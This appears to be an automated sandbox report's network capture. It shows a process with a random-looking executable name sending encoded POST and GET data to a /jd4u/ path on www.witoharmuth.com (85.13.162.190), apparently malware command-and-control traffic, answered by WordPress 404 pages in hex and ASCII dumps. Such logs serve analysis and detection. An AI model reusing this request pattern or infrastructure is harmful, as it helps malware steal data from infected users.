                                      Data Ascii: TTv82Lg=ibUvaV9OfhRHud5F/K1iTKogjEk9IdRQnEnAYM4AlEm/oWOrSOqLfRu2dMFzbk9F0IZillJ99Zl67bup3ydr+0qVpbnkqarV72R9jmTn7e9KYljRQOw5tn4z9sTQDVYAB+TxJQDuq+HYrP/5DL1DOVTm5Dlz9wwTMDA+KBHSnA03PnPJTjQYWpXfPBMjS2jmLj+Lez7tmxFJBw7AVUK6SlWHbNPQ
                                      Jun 10, 2024 10:21:07.142230034 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:06 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED]
                                      Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden &#8211; witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
                                      Jun 10, 2024 10:21:07.142250061 CEST212INData Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75
                                      Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/*! This file is auto-gen
                                      Jun 10, 2024 10:21:07.142265081 CEST1236INData Raw: 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61
                                      Data Ascii: erated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,
                                      Jun 10, 2024 10:21:07.142280102 CEST1236INData Raw: 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74
                                      Data Ascii: ",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.
                                      Jun 10, 2024 10:21:07.142293930 CEST424INData Raw: 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65
                                      Data Ascii: ceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var
                                      Jun 10, 2024 10:21:07.142317057 CEST1236INData Raw: 74 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73
                                      Data Ascii: ttings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !i
                                      Jun 10, 2024 10:21:07.142366886 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63
                                      Data Ascii: p--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--pres
                                      Jun 10, 2024 10:21:07.142383099 CEST1236INData Raw: 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32
                                      Data Ascii: );--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--pre
                                      Jun 10, 2024 10:21:07.142400980 CEST636INData Raw: 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35
                                      Data Ascii: rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0
                                      Jun 10, 2024 10:21:07.142416954 CEST1236INData Raw: 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65
                                      Data Ascii: k-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset
                                      Jun 10, 2024 10:21:07.147352934 CEST1236INData Raw: 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65
                                      Data Ascii: uish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.55136985.13.162.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:08.710488081 CEST1760OUTPOST /jd4u/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.witoharmuth.com
                                      Referer: http://www.witoharmuth.com/jd4u/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 69 62 55 76 61 56 39 4f 66 68 52 48 75 64 35 46 2f 4b 31 69 54 4b 6f 67 6a 45 6b 39 49 64 52 51 6e 45 6e 41 59 4d 34 41 6c 45 75 2f 6f 45 32 72 54 74 43 4c 59 52 75 32 55 73 46 79 62 6b 38 48 30 49 42 39 6c 6c 55 47 39 63 68 36 37 34 32 70 77 44 64 72 6e 45 71 56 32 72 6e 6e 33 4b 72 4d 37 32 68 35 6a 69 7a 6e 37 65 39 4b 59 6e 72 52 47 4c 4d 35 2b 33 34 77 34 63 54 58 48 56 59 6b 42 39 69 4d 4a 55 66 51 70 4b 37 59 72 76 76 35 46 34 4e 44 47 56 54 6b 36 44 6c 64 39 77 31 4e 4d 48 68 46 4b 41 79 46 6e 41 63 33 50 51 6a 55 50 77 31 45 49 34 48 68 50 52 46 43 51 6a 6a 67 53 6c 2b 33 64 43 48 63 6d 42 52 79 4c 6e 76 74 58 57 33 65 4f 51 61 30 62 74 36 78 42 54 50 6b 31 70 77 4d 4f 30 70 49 58 51 4d 49 53 74 58 64 65 6e 37 55 67 6a 4a 51 4d 2f 68 34 77 38 49 78 6f 4f 67 4d 4f 39 64 4b 2b 61 35 7a 68 44 45 70 4c 54 4b 76 67 69 6b 57 45 48 56 46 65 52 38 68 42 6a 2f 71 61 48 67 48 75 36 4a 4d 39 64 49 5a 57 68 68 75 54 42 43 72 46 39 2b 4e 77 76 54 45 51 32 58 34 50 65 52 54 74 31 [TRUNCATED]
                                      Data Ascii: TTv82Lg=ibUvaV9OfhRHud5F/K1iTKogjEk9IdRQnEnAYM4AlEu/oE2rTtCLYRu2UsFybk8H0IB9llUG9ch6742pwDdrnEqV2rnn3KrM72h5jizn7e9KYnrRGLM5+34w4cTXHVYkB9iMJUfQpK7Yrvv5F4NDGVTk6Dld9w1NMHhFKAyFnAc3PQjUPw1EI4HhPRFCQjjgSl+3dCHcmBRyLnvtXW3eOQa0bt6xBTPk1pwMO0pIXQMIStXden7UgjJQM/h4w8IxoOgMO9dK+a5zhDEpLTKvgikWEHVFeR8hBj/qaHgHu6JM9dIZWhhuTBCrF9+NwvTEQ2X4PeRTt1E3uySNiCnZiChBx6YzFq519dY+ov9vgwRGi7cZnl7MKB2vZZ889wFd92nz/jPGCWxEjMKs+dPX1Gen2+7UpcOM596+OtpbR63Lcpb5hdrXdF76Qkwfxj7cM5MUi/mxSN31HINkwp8mZg7Lgs/jrAmVDj6NJpThGJCQDeszyNZtHfGHNdTPqpWorzt6N97uepOvcm41WqtUd2hD//UYD6C/C1rtRFB8HTTQhe3UZHlDQ8Q0ZmJjrZSQyI9xML2wxDZkAx64148AWLBXA4IUUtmRO2x2EJfLs47dRjjrBlZbjDJHWmF82bhFqIM0eRmJknTQonElY1SJV2LN/MHNWMr8EEDyVpptcS+55tEA3LnFEtMoENEEwlcuRrFbLqr+VCelqiYE6jPTzDxpEAFGk5mgEXWDB0QjNkGDBveVcwn+O1n6v+Rt+bJXvVz5gq9SJHNnOSrAVcDOBLUliX/aLSDfXQVTWliyBv92iuNa66GGRFhdxV+kLnsIGrxMTeyL+2qwN9sOo4TC61Z3cWoBz2Xlnsh21JXuJ5VgrKXiGI2MwpVX4soPfVz523Vlzz9QeAm3yHIwuGse1Hom+OTKNCkSVMIHby4NJLa2aKhqQbHKXQd10ZMMzJMQOOM9nIR/BZmQjl4hAWPcLuiKiYMfZf4kKcWFQsFiLJbt [TRUNCATED]
                                      Jun 10, 2024 10:21:09.672548056 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:09 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED]
                                      Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden &#8211; witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
                                      Jun 10, 2024 10:21:09.672584057 CEST212INData Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75
                                      Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/*! This file is auto-gen
                                      Jun 10, 2024 10:21:09.672616959 CEST1236INData Raw: 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61
                                      Data Ascii: erated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,
                                      Jun 10, 2024 10:21:09.672633886 CEST212INData Raw: 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74
                                      Data Ascii: ",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettings
                                      Jun 10, 2024 10:21:09.672784090 CEST1236INData Raw: 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d
                                      Data Ascii: Supports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem
                                      Jun 10, 2024 10:21:09.672818899 CEST1236INData Raw: 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73
                                      Data Ascii: {return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><s
                                      Jun 10, 2024 10:21:09.672883987 CEST1236INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d
                                      Data Ascii: preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivi
                                      Jun 10, 2024 10:21:09.672956944 CEST636INData Raw: 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65
                                      Data Ascii: gb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush
                                      Jun 10, 2024 10:21:09.672965050 CEST1236INData Raw: 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65
                                      Data Ascii: 245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,11
                                      Jun 10, 2024 10:21:09.672971010 CEST1236INData Raw: 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65
                                      Data Ascii: layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-c2000olumns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid)
                                      Jun 10, 2024 10:21:09.677870989 CEST1236INData Raw: 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72
                                      Data Ascii: color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-whi


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.55137085.13.162.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:11.241456985 CEST458OUTGET /jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.witoharmuth.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:12.155147076 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:21:11 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED]
                                      Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden &#8211; witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de &raquo; Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
                                      Jun 10, 2024 10:21:12.155214071 CEST1236INData Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75
